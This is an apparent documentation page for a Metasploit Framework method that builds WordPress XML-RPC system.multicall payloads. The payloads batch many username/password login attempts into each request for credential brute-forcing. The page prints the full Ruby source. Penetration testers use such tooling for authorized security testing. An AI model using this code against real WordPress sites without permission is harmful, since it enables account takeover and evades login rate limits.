Method: Metasploit::Framework::LoginScanner::WordpressMulticall#generate_xml

Defined in:
lib/metasploit/framework/login_scanner/wordpress_multicall.rb

#generate_xml(user) ⇒ Array

Returns the XML data that is used for the login.

Parameters:

  • user (String)

    username

Returns:

  • (Array) 


42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
 
# File 'lib/metasploit/framework/login_scanner/wordpress_multicall.rb', line 42

def generate_xml(user)
  xml_payloads = []

  # Evil XML | Limit number of log-ins to CHUNKSIZE/request due
  # Wordpress limitation which is 1700 maximum.
  passwords.each_slice(chunk_size) do |pass_group|
    document = Nokogiri::XML::Builder.new do |xml|
      xml.methodCall {
        xml.methodName("system.multicall")
        xml.params {
        xml.param {
        xml.value {
        xml.array {
        xml.data {
        pass_group.each  do |pass|
          xml.value  {
          xml.struct {
          xml.member {
          xml.name("methodName")
          xml.value  { xml.string("wp.getUsersBlogs") }}
          xml.member {
          xml.name("params")
          xml.value {
          xml.array {
          xml.data  {
          xml.value {
          xml.array {
          xml.data  {
          xml.value { xml.string(user) }
          xml.value { xml.string(pass) }
          }}}}}}}}}
        end
        }}}}}}
    end
    xml_payloads << document.to_xml
  end

  xml_payloads
end